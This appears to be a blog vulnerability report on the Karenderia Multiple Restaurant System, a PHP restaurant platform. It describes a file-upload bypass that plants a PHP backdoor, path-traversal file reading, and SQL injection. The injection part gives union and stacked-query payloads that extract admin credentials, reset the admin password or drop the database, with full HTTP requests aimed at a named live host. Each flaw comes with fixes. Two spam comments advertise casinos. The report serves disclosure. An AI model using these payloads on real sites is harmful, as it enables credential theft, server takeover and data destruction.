Karenderia Multiple Restaurant System Report multiple vulnerabilities

Karenderia Multiple Restaurant System Report.
Karenderia Multiple Restaurant System hacking


1. UNRESTRICTED FILE UPLOAD
File: protected/components/AjaxAdmin.php
Function name: uploadImage
The error lies here is. $qqfile=$_GET['qqfile']; preg_match("/.php/i", $qqfile) now the function get the file name from get request variables and test if it consists of any php extension.
But for naming and moving file $this->data variable is passed. So if attacker sends get request for file upload value of checking parameter i.e $qqfile and $this->data[‘qqfile’] will be same. But in case of POST Request with qqfile as query parameter the result is different as shown.
                                     $pathinfo = pathinfo($this->data['qqfile']);  
Now if I send a POST Request instead of GET to server with POST parameters: qqfile = backdoor.php content = <?php code…. ?>
the file will be uploaded.
Example:
POST Request:
POST /admin/ajax?qqfile=avatr.png HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Content-Length: 7
Content-Type: application/x-www-form-urlencoded

action=uploadImage&qqfile=backdoor.php&currentController=admin&content=<?php code.... ?>
here You will see that “?qqfile=avatar.png” is GET parameter and this successfully pass your testing case for php.
And POST parameter qqfile will be used for file name hence php backdoor will be uploaded.
One more thing. CurrentController=admin.
Instead of value “admin” value “store” can also be used (any value will be ok for currenController). There is not check present in the code to determine if session is for admin or store. (taking ABOUT uploadImage function specially).

How to Prevent it.
1.  Instead use the method used in MOBILEAPP module for uploading file i.e in protected\modules\mobileapp\components\uploder.php.
Or 
2.  modify code for function uploadImage as explained.
$qqfile = $this->data['qqfile'];
Instead of $qqfile = $_GET[‘qqfile’];
Now weather it be POST OR GET request parameters variable both will be tested out.
And instead of PREG_MATCH for testing out if extension is Php or not.
Make an array of allowed file extension. 
$ allowed = [‘.jpg’,.JPG’,’.png’…….;
If(extension in allowed array){
$newfiename = oldname+timestamp+extension;
}
I am suggesting this because PREG_MATCH which produce INVALID FILE for a image name: “xyzdsfkj.phpxyz123.png
Appending extension name from allowed one’s prevent renaming of uploaded file of attacker choice. Thus whatever the file name and extension be in the end only the allowed extension will be appended.
Now upload is safe.
2. LOCAL FILE INCLUSION.
Condition: can only be exploit after admin login. ( sql injection to view admin_user passwords and then login with it).
File: AdminController.php
Function actionviewFile
GET parameter : fileName.
Now fileName=xyzimage.jpg will show file from upload directory but using file traversal ../../ we can view any file within permission of php script.
It is very harmful for VPS hosted website because linux file system can be view and that helps to takeover full system. Example:
http://bastisapp.com/kmrs/admin/viewfile?fileName=../protected/config/main.php

sql injection

MOST IMPORTANT SQL INJECTION
Vulnerable files: Ajax.php, AjaxAdmin.php or any other files that are using Db operations and unsanitized input from user.
Example how sql injection was performed using union query.
File: AjaxAdmin.php
Function: loadCreditCardListMerchant
Injection parameter: merchant_id
Payload for union: 1’ and 1=2 union all select $injection_point,2,3,4,5,6,7,8,9,10 # Payload for stack query = 1’ ; $sql_query ; #
Original Post Request:
POST /kmrs/admin/ajax HTTP/1.1
Host: bastisapp.com
Connection: keep-alive
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0  AppleWebKit/537.36 (KHTML, like Gecko) Chrome /537.36
Referer: http://bastiapp.com/kmrs/profile
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,hi;q=0.7
Cookie: _lang=en; kr_cookie_law=2; kr_search_address=Los+Angeles%2C+CA%2C+United+States; client_location=%7B%22lat%22%3A34.0522342%2C%22long%22%3A-118.2436849%7D;
PHPSESSID=9793600ef0691414fd809e6b7524df45;
YII_CSRF_TOKEN=c47c288be746247583d9f19c288f76d579e5efab merchant_id=1&action=loadCreditCardListMerchant&currentController=store&yii_session_token=9793600ef069141 4fd809e6b7524df45&YII_CSRF_TOKEN=c47c288be746247583d9f19c288f76d579e5efab

this is original request can be modified to view desired result.
Like we know that merchant_cc table have 10 columns and select * ….. query is used in that function.
So we will make union query for 10 column as shown in payload.
The POST requested merchant_id paratmer will be modified to :
merchant_id=1’ and 1=2 union all select concat(username,password),2,3,4,5,6,7,8,10 from mt_admin_user # this will make query in your PHP application as to be executed.
SELECT * FROM
       {{merchant_cc}}        WHERE 
merchant_id='1’ and 1=2 union all select concat(username,0x20,password),2,3,4,5,6,7,8,10 from mt_admin_user #'
                             ORDER BY mt_id DESC
And your app will return:

result

Now the Dangerous Stack Queries:

same post request modified for merchant_id parameter as:
merchant_id =1’ ; sql_query ; # 
here the sql_query can: update,delete, alter,drop.
Example drop database db_name
The generated sql query will be:
SELECT * FROM
       {{merchant_cc}}        WHERE 
merchant_id= ‘1’ ; update mt_admin_user set password = ‘new_md5_hash_for_pass_you_know’ where admin_id=1 ; # ‘
                             ORDER BY mt_id DESC
Please not that you cannot execute Select statement from stack query unless the code is really really  bad.
PREVENTION:
1.                   Prevention is to use quote value function, or sanitize string for longer text from yii in all the Db operations where the sql query is used with input (GET/POST) from user.
2.                   Prepared statements are used in php for fully protection from injection. ( you may check if yii 1 supports prepared statements or not). 
Please note that I have displayed only for loadmerchantcreditcard function the same method will be applicable for any other function that is interacting with database without properly sanitizing the input from user. You will need to take prevention steps wherever this type of mistake is done to make secure application.


Links: https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694

2 Comments

  1. Play online casino games for real money - Online Casino
    Enjoy a wide happyluke range 카지노 of casino games online with the option jeetwin to choose from hundreds of casino games to play on your laptop or mobile device.

    ReplyDelete
  2. Casino - Dr.MCD
    Casino. Dr.MCD's database contains all 밀양 출장마사지 the information 포항 출장마사지 you need to 나주 출장마사지 know about online 대구광역 출장마사지 gambling in order to 광주 출장샵 keep you organized. It's not only about the

    ReplyDelete

Newest